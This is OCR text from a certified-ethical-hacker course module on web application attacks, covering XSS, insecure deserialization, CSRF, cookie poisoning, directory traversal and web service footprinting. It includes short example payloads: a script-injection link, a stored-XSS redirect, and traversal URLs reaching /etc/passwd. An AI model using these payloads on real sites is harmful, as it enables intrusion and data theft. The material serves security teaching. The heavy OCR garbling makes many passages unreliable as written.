unusedpages,unpatched
Attackerscan access default
filesand directories,andso on to gain
accounts, flaws,unprotected
unauthorizedaccess. The person responsible shouldtake care of all suchunnecessaryand
unsafefeatures. Disabling
themcompletely wouldprove to be highly beneficial,preventing
outsidersfrom using them for maliciousattacks.Toavoid leakage of crucialinformationto
the networkadministrator
attackers, shouldthustakecare of all application-basedfilesthrough
proper authenticationand strongsecurity methods.For example, if the applicationserver
adminconsole installedandnot removed,
is automatically andthe defaultaccounts are not
changed, then the attackerdiscoversthe standardadminpages on the server, logsi n with
defaultpasswords,
andestablishes
controlover theserver.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AT Cross-SiteScripting
-

Attacks
(KSS)
(©Comte
‘pl
neater
sete Ho
sym.
C5) ack
erm
X38Work
Ragen
ow Attacks

stn pate rut —

soa |@
&

AI- Cross-SiteScripting (KSS) Attacks

Cross-site scripting(XSS CSS)
or attacksexploit
vulnerabilitiesi n dynamically
generated web
pages,whichenables maliciousattackers client-side
to inject scriptinto web pagesviewedby
otherusers. Suchattacksoccur wheninvalidatedinputdatais includedin dynamic content that
is sent to a user'sweb browser for rendering.
AttackersinjectmaliciousJavaScript,VBScript,
‘ActiveX,
HTML,or Flashfor execution on a victim'ssystembyhidingit within legitimate
requests. Attackersbypass mechanisms,
client-IDsecurity gainaccess privileges,
andthen inject
maliciousscriptsinto specific web pages.Thesemaliciousscriptscan even rewrite HTML
‘website
content,
Someexploitations
=
that
can beperformed
byXSSattacksare asfollows:
script
Malicious execution =
hijacking
Session
=
Redirecting
to a malicious
server =
Brute-forcepassword
cracking
=

‘=
Exploiting
user
privileges
Adsi n hiddenIFRAMESandpop-ups
=
Datatheft
Intranet probing
Data manipulation Keylogging
andremote monitoring
HowXSSAttacksWork
web pageconsistsof text andHTMLmarkup
‘A createdbythe server andobtainedbythe client
browser.Serverscan controltheclient'sinterpretation aboutthe staticallygenerated pages,
but theycannot completely control the client'sinterpretation of the output of the page
generateddynamically bythe servers. Thus, if the attackerinserts untrustedcontent into a
dynamic page,neitherthe server nor the client recognizesit. Untrustedinputcan come from
URLparameters,formelements, cookies,databasequeries, andso on

Module4 1759
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
If the dynamic bythe web server contains special
data inserted characters,
the user'sweb
browserwill mistakethem for HTML markup, as it treats some characters as specialto
distinguish
text from markup. Thus, an attacker can choose the data insertedinto the
generatedpage and misleadthe user'sbrowserinto running the attacker'sscript.As the
malicious
scriptswill execute in the browser'ssecurity context for communicatingwith the
legitimate
web server, the attackerwill have complete access to the documentretrievedand
maysendthedatain the pagebackto his/her site.

NormalRequest ‘ise xam

wes
avulnrabie

Note:Check
the
CEH Tools,Module14:Hacking
WebApplications,theXSS
for cheat
sheet.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Cross-SiteScripting Attack Scenario:Attack via Email
In cross-sitescripting
a attackthat employs email,the attackercraftsan emailthat contains a
linkto the malicious scriptand sendsit to the victim,luringthe victim into clickingthe link
containingthe maliciousscript/query.Forexample, if the attackerfinds a cross-sitescripting
vulnerability
o n the bank.com website, he/she constructsa link embedded with a malicious

scriptsuchas
<AHREF=http: //bank .com/registration.cgi?clientprofile=<SCRIPT>maliciouscode</
SCRIPT>>Click here</A>
and sendsan email to the targetuser. Whenthe user clicksthe link,the URL is sent to
bank.com with the maliciouscode.Thelegitimateserver hosting
the bank.comwebsitesendsa
of
pagebackto the user including
user enters all the necessary
thevalue clientprofile,

personal
andthe malicious
the clientmachine.Themaliciouscodeasksthe victim to enter profile
detailsand clicksSubmit,
codeis executedon
information. Afterthe
the attackerreceives the
information.Theattackercan use thesedetailsto impersonate the user to gain accessto the
User's
online
account
other
fraudulent
activities.
bank andperform

ical andCountermensores
Mackin ©by E-Comel
Copyright
 attack viaeral
18.17:Â¥88
Figure
XSSExample:
Attackvia Email

Attacker Server

Malicious
Seript
attacker's Legitimate
ina

Figure
14.18:
X35example
attackvi email

ical andCountermensores
Mackin ©by E-Comel
Copyright
XSSExample:
Stealing
Users’
Cookies

Attacker Server

Malicious
Browser
User's

Seript
‘Attacker's
Server
Legitimate
sitions

consiructa
© maticous
( _Segiaeeariontink
oyvetinntpetinon

XSSExample: an Unauthorized
Sending Request
X55
Figure 16.19:
example
cookies wer’
Stealing

Attacker Server

Malicious
User's

Browser
Script
‘attacker's
Server
Legitimate
time

@ conse mation

aN prt emer

Onn. i

oe
Pema
te,

Figure an unauthorized
14.2035 exampleSending request

ical andCountermensores
Mackin ©by E-Comel
Copyright
 XSSAttackin BlogPosting

XSSAttack in Blog
Posting
Theattackerfindsan XSSvulnerability
i n the techpost.org
website,constructsa maliciousscript
ponload=window.location="http://www.certifiedhacker.com’</scrip
and addsit i n
the comment field of TechPost. Thismaliciousscriptposted bythe attackeris storedon the
application
‘web database server and runs i n the background.
Whena user visits theTechPost
website,the maliciousscriptinjected bythe attackerin the TechPostcomment field activates
andredirectsthe user to the malicious websitecerti

ical andCountermensores
Mackin ©by E-Comel
Copyright
 XSSAttackin CommentField

XSSAttack in CommentField
Many
web applications
use HTMLpagesthat dynamically
acceptdatafromdifferent sources.
(Onec an
change
thedatai n the HTML pagesaccording
pagetagsto manipulate
malicious
data.They
to the request.
launchan attackbychanging
Attackers
use HTMLweb
the comments featureusinga
Whenthe targetseesthecomment and activatesit, thenthetargetbrowser
script.
scriptto accomplish
executesthemalicious the attacker'sgoals.
Forexample, an attackerfinds a vulnerablecomment field i n the TechPost.org
website.Thus,
heconstructsthe malicious script“<script>alert
("Hello World") </script>“
andaddsit along
with his comment in the comment field of TechPost. Thismaliciousscript,along
with the
comment posted
bythe attackeri n the comment field,i s storedon the web application's
databaseserver. Whena user visits the TechPostwebsite,
the codedmessage “Hello
World―
popsup whenever the web pageis loaded.Therefore,whenthe user clicksOKi n the pop-up
window,theattackercan gainaccessto the user'sbrowserandsubsequentlyperform malicious
activities.

Module4 1765
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
nment el

recounet
 A8 InsecureDeseri:
-

alization

| ssa

48 InsecureDeserialization
-

‘As is storedi n the formof datastructures (graph,

data i n the computer trees,array, etc),data
serializationanddeserialization
is an effectiveprocess for linearizing
andde-linearizing data
objects themto othernetworksor systems.
to transport
Serialization
Consideran example of an object “Employee―
(forJAVAplatform),wherethe Employee
objectconsistsof data suchas name, age, city,and EmpID. Due to the processof
the object
serialization, data will be convertedinto the following linear format for
to differentsystems
transportation or differentnodesof a network.
-<Employee><Nane>Rinni</Name><Age>26</Age><Ci
</EmpID></Employee> ty>Nevada</Ci
ty><EmpID
Empoyee

14.23Serialization
Figure process

»yeo-Goune
Deserialization
i s the reverse processof serialization,
Deserialization whereby the objectdata is
recreatedfrom the linear serializeddata. Due to the process of deserialization,
the
serializedEmployee objectgivenin the abovementioned example will be reconverted
data the
into the object as showni n figurebelow:

<Employee>iame>Rinni
</Nane><Age>26</
ty><Enp1D>2201</EmpID></Employee>
Nevadac/Ci

J
Deserialization
cmon
|
Nome

inn

InsecureDeserialization
Thisprocessof serializationand deserializationi s effectively
used in communication
betweennetworks, and its widespread
usageattracts attackersto exploit
the flawsi n
this process.Attackersinjectmaliciouscode into serializedlinearformatteddata and
forwardthe maliciousserializeddata to the victim, An example of maliciouscode
injection lineardatabythe attackeris shownbelow:
into serialized
-<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada
</City><EmpID>2201</EmpID>MALICIOUS
PROCEDURE</Employee>
Due to insecure deserialization,
the injected
maliciouscodewill be undetectedand
remain presenti n the finalexecution of the deserialization
code.Thisresultsi n the
execution of malicious
in the following
figure: procedures
of
along
withthe execution serialized data,
as shown

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Attacker
m aliciouscodein
Injects
serialized data

‘<Emp
loyoa><tana>Ainn!
</Nane><Age>?6</A
ty>hevada
</Chty><Bnpl0>2203¢/EmpIDMALICIOUS
PROC

Insecure
Deserialization

[ene Jom a =

Wack

“ & 4 EN
Name
bee‘ty
26
Emi

14.25:
Figure Insecure
Deseriization
stack
Thiscouldhave a severe impacto n the system, as it wouldauthorizethe attackerto
execute and run systems remotely.Moreover, any softwareor server vulnerableto
attackscouldbeadversely
deserialization affected.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AQ -

Using with KnownVulnerabilities

Components
©Mostw ebappliations
thatuse components suchas
bares andframeworks executether withal

and
always
privileges,flawsa anycomponent
an result i n

by
dependencies
anaiss
scanning
or byperforming
manual

asDatabase
such Exploit
expel
a.com),
(http://w.
andSecurtyFoeus
(htes://wwc
secrtyfocus.com)
fa unerablecomponents
isnt, theattacker

‘succesful allows the attacker

exploitation to case

9 -

Using with KnownVulnerabilities

Components
Components
suchas librariesandframeworksthat are usedi n most web applications
always
execute with full privileges,
andflawsi n any component can havesevere consequences.
Attackerscan identify
weakcomponents or dependencies
byscanningor byperforming
manual
analysis.
Attackers on exploit
searchfor any vulnerabilities sitessuchas Exploit
Database
(hetps://www.exploit-db.com),
Focus(https://www.securityfocus.com),
Security and Zero Day
(https://www.zerodayinitiative.com).
Initiative If a vulnerablecomponentis identified, the
attackercustomizesthe exploit as required
and executes the attack.Successful exploitation
allowsthe attackerto cause serious datalossor take over controlof the servers. An attacker
generallyuses exploitsites to identify
the web application exploitsor performs vulnerability
scanningusingtools suchas Nessus and GFl LanGuardto identify the existingvulnerable
components,

known
with
Web aopation

vulnerable
components
14.26:Attackona
Figure
web vulnerable
components
application
withknawn

Module4 1770
Page
©
ical andCountermensores
Mackin Copyright
by E-Comel
 14.27:Screenshotdisplaying
Figure Databaseseach resus forweb application
Explolt exploit

ical andCountermensores
Mackin ©by E-Comel
Copyright
 A10 InsufficientLogging
-

and Monitoring

410 Insufficient Logging

-

and Monitoring
Webapplications maintain logsto track usage patterns, suchas user logincredentialsand
adminlogin credentials.Insufficient loggingandmonitoring referto scenarios i n whichthe
detectionsoftwareeitherdoesnot recordthe maliciousevent or ignoresthe important details
aboutthe event.Attackers usually inject,delete, or tamperwith the web application logsto
engagein maliciousactivities or hidetheiridentities.Dueto insufficientloggingandmonitoring,

perform maliciousattacks, of
the detectionof maliciousattemptsthe attackerbecomes
suchas password brute-forcing,
m ore difficultandthe attackerc an
to stealconfidentialpasswords.

18.28:attack ona
Figure with nsfficientlogging
web application a ndmonitoring

ical andCountermensores
Mackin ©by E-Comel
Copyright
 OtherWebApplication
Threats

OtherWebApplication
Threats
Webapplication
threatsare not limited to attacksbasedo n URLand port 80. Despite
using
ports,protocols,
and OSI layers, vendorsmust protectthe integrityof mission-critical
applications
attacks
being
able all
frompossible
Thevarious types
future
of webapplication
by
threatsare
to dealwith attackmethods.
as follows:
+
Directory
Traversal
Attackersexploit
HTTP bydirectory whichgivesthem accessto restricted
traversal,
directories;
theyexecutecommands
outsidethewebserver'sroot directory.
UnvalidatedRedirects
andForwards
Attackerslurevictims into clicking
on unvalidatedlinksthat appearto be legitimate.
Suchredirectsmayattemptto installmalwareor trickvictims into disclosing
passwords
or other sensitive information.Unsafeforwards may allow access control bypass,
leading
*
to
Session
FixationAttack
+
Security Exploits
Management
+
Failure
to RestrictURLAccess
+

Watering
HoleAttack
File
Malicious Execution

It is a typeof unvalidatedredirectattackwhereby
the attackerfirst identifiesthe most
visitedwebsiteof the target,determinesthe vulnerabilitiesi n the website, injects
maliciouscode into the vulnerableweb application,
and then waits for the victim to

ical andCountermensores
Mackin ©by E-Comel
Copyright
browsethe website.Oncethe victim tries to accessthe website,
the maliciouscode
infecting
executes, the victim,
Cross-Site
Request
Forgery
Thecross-siterequestforgery methodis a typeof attackin whichan authenticateduser
is madeto performcertain taskson theweb application that an attackerchooses,
e.g., 2

user ona
clicking particular
Cookie/SessionPoisoning
linksent through
or
an email chat.

Bychanging informationinside a cookie,

the attackersbypassthe authentication
Oncetheygain controlover a network,
process. theycan modify use the
its content,
system attack,
for a malicious or stealinformationfromusers’
systems.
WebServiceAttacks
attackercan
‘An get into the targetweb application by exploiting an application
integrated with vulnerableweb services. An attackerinjectsa maliciousscriptinto a
web service andcan thendiscloseandmodify applicationdata
Cookie
Snooping
use cookiesnoopingon victims’
‘Attackers systems to analyze surfing
the users’ habits
andsellthat informationto otherattackersor to launchvarious attackson the victims’
webapplications.
HiddenFieldManipulation
‘Attackers
attemptingto compromise e-commerce websitesmostlyperform
such
attacks.They
manipulate
hiddenfieldsandchange
the datastoredi n them.Several
online stores facesuchproblems every day.Attackerscan alter pricesand conclude
transactions,designating
Hijacking
Authentication
pricesof their
choice.
Forauthenticatinga user, everyweb application employsa user identificationmethod
suchas an ID anda password. However, once attackerscompromise a system, theycan
perform activities suchas sessionhijacking
various malicious anduser impersonation.
Application
Obfuscation
Attackersare usually carefulto hide their attacksand avoiddetection.Networkand
host-based intrusion detectionsystems (IDSs) constantly
look for signsof well-known
attacks,
driving attackersto seekdifferent ways to remain undetected.The most
methodof attackobfuscation
‘common involvesencoding portionsof the attackwith
Unicode,UTF-8, Base64, or URLencoding. Unicodeis a methodof representing letters,
andspecial
numbers, characters display
to properly them,regardless
oftheapplication
underlying
or platform,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Broken
SessionManagement
If sessionIDsare exposed i n the URL, then web applicationsare vulnerableto session
fixationattacks.Furthermore,
changed ifthe session timeout is longer
after every login,attackersmay hijack
session with the same privilegesas the victim.
andthe session IDs are not
the session and take controlof the

BrokenAccountManagement
functions,
Vulnerableaccount management including
account update,
forgotten
or lost
password
recovery, reset password, mightweakenvalid
and other similarfunctions,
authenticationschemes,
(DoS)
Denial-of-Service
‘A
DoSattackis an attackon the availability
of a service, whichreduces, restricts,
or
preventsa ccess to systemresources byits legitimate users. For instance,a website
relatedto a banking
or emailservice may not able to functionfor a few hoursor even
days,
resulting
i n theloss
of time andmoney.
BufferOverflow
web application's
‘A bufferoverflowvulnerabilityoccurs whenit fallsto guard
i ts buffer
properly
andallowswritingbeyond its maximum size.
Attacks
CAPTCHA
CAPTCHA typeof test implemented
i s a challenge-response byweb applications
to
checkwhetherthe response is generated bya computer.Although CAPTCHAsare
designedto be unbreakable,
theyare proneto various typesof attacks.
PlatformExploits
using different platforms
Userscan build various web applications such as BEA
Weblogic and Cold Fusion.Eachplatformhas various vulnerabilities
and exploits
associated
with it
NetworkAccessAttacks
Networkaccessattackscan majorly
affectwebapplications,
including
a basiclevelof
service. They
c an alsoallow levelsof access that standardHTTPapplication
methods
cannot

DMZProtocol
grant,
Attacks
The demilitarizedzone (DMZ) is a semi-trustednetwork zone that separates the
untrustedInternet fromthe company's trustedinternalnetwork.An attackerwho can
compromise a system that allowsother DMZ protocols hasaccessto other DMZsand
internalsystems.Thislevelof access can leadto
©

©.
Compromise
Defacement
of
the webapplication
ofwebsites
and data

ical andCountermensores
Mackin ©by E-Comel
Copyright
 to internal
‘Access systems, backups,
databases,
including andsource code
Timing
Web-based Attacks
timingattacksexploit
Web-based
takenforsecret key
andpasswords
operations.
leakage
side-channel
perform
Attackers
for accessingwebapplications.
andestimate the amount time
theseattacks
to of
retrieve usernames

MarioNet Attack
‘Attacker
abusetheServiceWorkers andrun maliciouscodei n thevictim's
API to inject
browserto perform various attackssuch as cryptojacking,DD0S, click fraud,and
password
distributed cracking.
RC4NOMORE Attack
A
Rivest CipherNumerousOccurrence
attackis an attackagainst
present
MOnitoring
the RC4stream cipher.
and Recovery Exploit
Thisattackexploits
in a web server that usesthe RC4encryption algorithm
(RC4 NOMORE)
thevulnerabilities
for accessing encrypted
sensitive information.Attackersuse RC4NOMOREto decrypt the webcookiessecured
bythe HTTPSprotocol andinjectarbitrary packets. Afterstealing the
a valid cookie,
attackerimpersonates the victim andlogsinto thewebsiteusing thevictim'scredentials
to perform maliciousactivities andunauthorizedtransactions.
Clickjacking
Attack
In clickjacking, iframe.Then,
the attackerloadsthe targetwebsiteinsidea low opacity
the attackerdesignsa page suchthat all the clickable
items suchas buttons are
positionedexactly
as on the selectedtargetwebsite.Whenthe victim clickson the
invisible theattacker
elements, performsvarious malicious
actions.
JavaScriptHijacking
JavaScript hijacking,
also known as JSONhijacking, is a vulnerability
that enables
attackersto capturesensitive informationfromsystems Objects
usingJavaScript (JSON)
asa datacarrier. Thesevulnerabilitiesa rise fromflawsin thewebbrowser’s
same-origin
policy that permitsa domainto addcodefromanother
Rebinding
DNS Attack
domain.
perform
‘Attackers DNSrebinding attacksto bypass
the same-originpolicy's
security
constraints andcommunicate with or makearbitrary to localdomainsthrough
requests
maliciouswebpage.
‘a

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Traversal
Directory

‘uci
can tht with
manipulate vibes fren les dt lsh)

A=
Traversal
Directory
When access is provided
outside a defined application,
there exists the possiblity
of
unintendedinformation disclosure or modification.
Complex are configured
applications with
multiple
directoriesthat exist as application
components anddata.An application
can traverse
to locateand execute the legitimate
thesedirectories portionsof an application.
A directory
traversal/forceful
browsing attackoccurs whenthe attackeris able to browsethe directories
andfilesoutsidethe normalapplicationaccess. Suchan attackexposesthe directory structure
of an application
andoftenthe underlying web server andoperatingsystem.Directory traversal
allows attackers to access restricted directories, includingapplication source code,
configuration, files,and execute commands
andcriticalsystem outsidethe webserver'sroot
directory.
Withthisevel of access to webapplication
architecture,
a n attackercan
+

+
Enumerate
the
contents
of
files
and directories
(and
pagesthat otherwiserequireauthentication
Access payment)
possibly
+
Gainsecret knowledge
of the application
andits construction
+ user IDsandpasswords
Discover storedi n hiddenfiles
+

+
Locate
source
other
interesting
left
codeand
View sensitivedatasuchas customer information
files onthe server

Example:
The following
exampleuses“./"
to go backto severaldirectoriesandobtain file containing
the backup
of a webapplication
http://www-targetsite.com/../.././sitebackup.zip

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thisexample obtainsthe “/etc/passwd―
filefroma UNIX/Linux whichcontains user
system,
account information
http://www.targetsite.com/././././ete/passwd
Letus consideranotherexample
i n whichan attackertries to accessfileslocated
outsidea web
publishing
directory
using directory
traversal

http://www dir/somefile
certfiedhacker.com/process.aspx?page=.././././some
dir/some
http://www.certifiedhacker.com/../././../some
file

ical andCountermensores
Mackin ©by E-Comel
Copyright
 UnvalidatedRedirectsand Forwards

whereas
(©Unvalidated
redirectsenableattackers
to ntl malwareor trickvictimsint dcosingpasswordsor other sensitive
Information, unafeforwardsmayallow
acces contro bypassed
tobe

UnvalidatedRedirectsandForwards
Unvalidatedredirectsenableattackersto install malwareor trick victims into disclosing
passwords or othersensitive information, whereasunsafeforwardsmayallowaccesscontrol
bypass.An attackersendslinks to unvalidatedredirectsand luresthe victim into clicking on
them. When thevictim clickso n the

passwords
link,
thinking
that itis a valid site, it redirects

or other sensitive information.An attackertargets

thevictim
anothersite. Suchredirectsleadto the installationof malwareand mayeven trick victims into
disclosing unsafeforwarding to
to
bypasssecuritychecks.
Unsafeforwarding
may allowaccess controlbypass,
leading
to the following:
Session FixationAttack
Ina sessionfixationattack, tricksor attracts the user to accessa legitimate
theattacker
web server usingan explicit
sessionIDvalue.

Security
Management Exploits
Some attackerstargetsecuritymanagement systems,either i n networksor i n the
application
layer,to modify enforcement.
or disablesecurity An attackerwho exploits
management
security can directly
modifyprotectionpolicies,
delete existingpolicies,
andmodify
addnew policies, applications,
system data,
andresources.
Failureto RestrictURLAccess
application
‘An often safeguards sensitive functionality
or protects and preventsthe
displays
oflinksor URLsforprotection,
Attackers
accessthoselinksor URLsdirectly
and
perform
illegitimate
operations.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
Malicious
FileExecution
Maliciousfile execution vulnerabilitiesare presentin most applications.
The cause of
this vulnerability
is unvalidatedinputto a web server. Thus, attackersexecute and
processfiles on a web server and initiate remote code execution,install a rootkit
remotely,and—in at leastsome cases—takecomplete controlof the systems.
In an “unvalidated scenario,a user receives a phishing
redirect― luring
emailfroman attacker,
the user into clicking
the link. Thelink (malicious query)appears to be legitimate
becauseit
containsthename of a legitimate websitesuchas www.certifiedhacker.com at thebeginning
of
the
URL. However,
of
the latter part thelink contains
a URL(www.evilserver.com),
malicious
which it redirects the victim. When the user clicks the link, it redirects to the
www.evilserver.com website,and the server that hoststhe websitemightperform
illegal
to

activities suchas harvesting deploying

the user credentials, malware,
andso on.
forwarding"
“Unvalidated allowsattackersto access sensitive pagesthat are generally
restrictedfromviewing. Duringunvalidatedforwarding,attackersrequesta page froma server
with the forward (ie, by enteringa link with an embeddedforward query)
http://www.certifiedhackershop.com/purchase.jsp?fwd=admin.jsp,which reachesthe server
hosting the certifiedhackershop
website.Theserver, without propervalidation, redirectsthe
attackerto the sensitive adminpage,wherehe/she can access purchase records, registered
users, and so on. Thus,usingthis technique,
an attackercan successfully
bypass any security
checks.
Unvalidated Redirect

(Mtothet femme ee

Unvalidated Forward

tech ag
24.20 Unvalidated
Figure
para

ewok
RedirectsandForwardsexample

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Hole Attack
Watering
‘tacker
identifies
3 the kind
ofwebsitestarget frequentsurfs
company/indvidal a ndtests those
particle

spplation that
ca thewebpage
redirect anddowloadmalware
onto thevicim machine

‘on
hoe altackbecausetheattacker
Thisattack scale a watering
watingfos preyto arrive ata watering
wats
haeto dik water
forh e victimto flint
a trap,sia to

{When
downloaded
being
through
the victimsurfs
tothevet
theinfectedwebsite,
thewebpagerediects
themachine
machine, compromising
toa
2 wells
malicious serve,
thenatworK/orgaiaton
leading
tomalware

Hole Attack
Watering
In a wateringhole attack,
the attackeridentifiesthe kind of websitesfrequently
surfedbya
targetcompany/individual andtests thesewebsitesto identify any possiblevulnerabilities.
he/she
Oncethe attackeridentifiesthe vulnerabilities, injectsa maliciousscript/code
into the
‘webapplicationthat can redirectthe web page and downloadmalwareonto the victim's
machine.After infecting the vulnerableweb application, the attackerwaits for the victim to
access the infectedweb application. Thisattackis calleda wateringholeattack, as the attacker
waits for the victim to fall into the trap,similarto a lion waitingfor its prey to arrive at a
wateringhole to drink water. Whenthe victim surfsthe infectedwebsite, the web page
redirectshim/her anddownloadsmalwareonto his/her machine,compromising the machine
andindeedcompromising the network/organization

artacher Malisous
Server

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Cross-SiteRequest
Forgery Attack
(CSRF)
ow
CSRF
Attacks Work

pat
eh page

T hevictim
on
hols actve

Cross-SiteRequest (CSRF)
Forgery Attack
requestforgery
Cross-site also knownas a one-clickattack,occurs when a hacker
(CSRF),
instructs a
user’s
to
webbrowser senda requestto thevulnerablewebsitethrough
web page.Finance-related websitescommonly
attackerscannot access corporate intranets;
contain CSRF
hence,
a malicious
vulnerabilities.Usually,
outside
CSRFis one of the methodsusedto enter
these networks.The inability of web applications to differentiate a requestmade using
maliciouscodefrom a genuinerequest exposesit to a CSRFattack.Suchattacksexploit web
page vulnerabilities that allow attackersto forceunsuspecting users’browsersto send
maliciousrequests that theydid not intendto send.Thevictim user holdsan active session with
a trustedsite andsimultaneously visits a malicioussite, whichinjects a n HTTPrequestforthe
trustedsite into the victim user'ssession,compromisingits integrity.
In this scenario, the attackerconstructs a maliciousscriptand stores it on a maliciousweb
server. Whena user visits the website,
access to the user'sbrowser.
the
malicious
scriptand
the
attacker
gains
starts running

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Bo‘Trusted
Website
ee
Malicious
Website

C#
CoOiissiesisiss
&
Attacks
HowCSRF Work
Figure
14.32:
Cros
Request
(CSRF
attack Site Forgery example

In a CSRF attack,the attackerwaits for the user to connect with a trustedserver andthentricks
the
user into clicking
on a malicious
link,i t executesthe arbitrary
involvedi n a CSRFattack.
link containing arbitrarycode.Whenthe user clickson the
codeon the trustedserver. Thediagram belowexplains the steps

Client Side Code arog ita st

Malicious Code

14.33:
Figure ofCross
Working SteRequest
Forgery
(SRF)attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Cookie/SessionPoisoning
‘How
Cookie
Polroning
Works

Inject
Malicious
Content
he

Cookie/SessionPoisoning
Cookiesa re generally usedto maintain a session betweenweb applications and users; thus,
cookiesneedto transmitsensitive credentials frequently.
Theattackercan modifythecookies’
of
Informationwith ease to escalatea ccessor assumethe identityanother user.
Usually,
he/she a
the ai m of session is to uniquely
is accessing.
malicious
Poisoning
content or modify
cookies
bind every individualwith the web application
andsessioninformation
that
can allowan attackerto inject
theuser'sonlineexperience andobtainunauthorizedinformation,
Cookiescan contain session-specific datasuchas user IDs,passwords, account numbers, links
to shopping cart contents,suppliedprivateinformation, and sessionIDs.They exist as files
storedi n the client computer's memory or harddisk.A proxy can be usedfor rewriting the
sessiondata,displaying the cookiedata,and/or specifyinga new user ID or other session
Identifiersi n the cookie.Bymodifying the datai n a cookie,an attackerc an often gain escalated
accessor maliciously affectthe user'ssession.Many sitesofferthe abilityto "Remember me?―
andstore the user'sinformationi n a cookieso the user doesnot haveto re-enter thedatawith
everyvisit to thesite. Anyprivateinformation enteredis storedin a cookie. To protectcookies,
site developers often encodethem. Easily reversibleencoding methodssuchas Base64and
ROT13 (rotatingthelettersofthealphabet through 13characters) give a falsesenseofsecurity
to the
users
Threats
who view cookies.

Compromised
cookiesandsessions can provide

assuminganotheruser'sonline identity,
an
attackerto access accounts and assume the identityattacker
with
attackerscan review the original
allowing
user credentials, the
of other users of an application.
By
user'spurchase
history,
ordernew items,exploitservices,andaccessthe vulnerablewebapplication.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Oneof the easiest examples involvesusingthe cookiedirectly for authentication.Another
methodof cookie/session poisoninguses a proxy to rewrite the session data,displaying the
cookie dataand/or specifying
a new user ID or othersessionidentifiers in thecookie.
Thereare
four typesof cookies:persistent,
non-persistent,secure, andnon-secure. Persistentcookiesare
storedon a disk,whereas non-persistentones are storedin memory.Webapplications transfer
secure cookies

How CookiePoisoning
only
through
Works
SSLconnections.

Webapplications use cookies to simulate a statefulu ser browsing experience, dependingon

the end user and identityof the server sideof web application components. Cookiepoisoning
altersthe valueof a cookieat the client side beforethe requestis sent to the server. A web
server can send a set cookiewith the helpof any responseover the provided stringand
command.The cookiesare stored on the users’ computers and are a standardway of
recognizingu sers. Oncethe web server is set,it receives all the requestsfromthe cookies.To
provide further functionality
to the application,
cookiessupport modificationand analysis
by
JavaScript
In this attack,the attackersniffsthe user'scookiesand then modifiesthe cookieparameters
andsubmitsthem to the web server. The server then acceptsthe attacker'srequestand
it.
processes

‘GET
/store/buyaspx?checkout=yes
HITP/LO
ceptReferrer:
Host:

WebServer

ae servor
replies
‘Web with
requested
pageand
cookie on the user's browser
‘sets.

Usertrowiesa webpage

tach
SS, GET
phishing
«cookie
/stoe/ouy
foraspx?chechoutoyes
teas

HTTP/LO
comHos:
Acct
(Sniffing

Ftp
ran certitedhachershop */* Refers
certifiedhactershopcom/showprads
px
Cookie:SESSIOND-325896ASDO23SA3S07,BasketSiie-%
Nem>125;Rem2-2658;
Rem3-6652
TotlPrie>100;

Product t o attacker's
is delivered address

16.34:Working ofCookiePoioning
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebServiceAttack

12 eserves
are
on
XML
points;universal
"ple objet access
Ferves
based
defniton
language
description,
dscovery, (WSDL)
used deserve
forthe
andconnection
of
seh ¢ we

web
protocols

fo
protocl(SOAP)
an
sured
integration
(UDD)ae
for communion
and
description escover
betweenwebservice, whichre vulnerable various
Services:

WebServiceAttack
Similarto the way i n whicha user interacts with a web application
through
a browser,
a web
service can interact directly
withtheweb application
withouttheneedforan interactive user
sessionor a browser.Theevolutionandincreasing
attackvectorsin an application
framework.
WebServicesDefinition Language
u se of web servicesin
Webservices are basedon XML
(WSDL) for describing
new
suchas businesses
the connection points,Universal
offer
protocols
Description,Discovery, and Integration(UDI) for the description and discoveryof web
andSimple
services, Object AccessProtocol(SOAP) for communication betweenweb services,
whichare vulnerableto various web application
threats.
Theseweb services havedetaileddefinitionsthat allow regular
users and attackersto

of the informationrequired
examples
of
understandthe construction the services. Thus,
to fingerprint
web services provide
the attackerwith much
the environment to formulate an attack.Some
of thistypeof attackare as follows:
1. An attackerinjectsa maliciousscriptinto a web service and can discloseand modify
application
data.
attackerusesa web service for ordering
‘An products and injectsa scriptto reset the
quantityandstatus on the confirmationpageto lessthanwhathe or shehadoriginally
ordered,Thus,the systemprocessing the order requestsubmitsthe order,ships the
order,and then modifiesthe order to showthat the company is shipping a smaller
numberof products, buttheattacker endsup receivingmore ofthe product thanhe or
shepaysfor.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
10.35:
Web
stacks
services
and attacks

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebServiceFootprinting
Attack
©
aches
welfootprint
andMods
‘indingempate,
a applieation to getUDOinformation
such a s busines, business Serve,

XML
Query

WebServiceFootprinting
Attack
Attackersuse the UniversalBusiness Registry(UBR)as a major source to gather
information
aboutwebservices,as itis very usefulforbothbusinesses Its apublic
andindividuals. registry
that runs on UDDIspecificationsandSOAP.UBRis somewhatsimilarto a "Whoisserver― in
functionality. web services on a UDI server, businesses
To register generally
or organizations
Useone of the following
structures:
businessEntity:
holdsdetailedinformationaboutthe company,suchas company name
andcontact details.
businessService: a logicalgroup of singleor multipleweb services. Every
businessServicestructure is a subsetof businessEntity.
the technicalanddescriptive information a
EachbusinessService
about a businessEntity
outlines
element'swebservice.
bindingTemplate: a single
represents web service. It is a subsetof businessService
andit
contains technicalinformationthat is required
by a client application
to bind and
interact with a targetweb service.
technicalModel(tModel): takesthe form of keyed
metadataand represents
unique
conceptsor constructsin UDI.
Attackerscan footprint
a web application
to obtain any or all of theseUDDIinformation
structures.
XML
Query
POST /inquire HITP/1.1
Content-Type: text/xml; chase!
SOAPAction

ical andCountermensores
Mackin ©by E-Comel
Copyright
cache-Control: no-cache
Pragma:no-cache
User-Agent: Java/1.4.2_04
Host:
uddimicrosoft.com

Accept: text/html, image/gif, image/jpeg,*;q=

Connection: ke
Content-Length:213

//scemas..xn1soap.
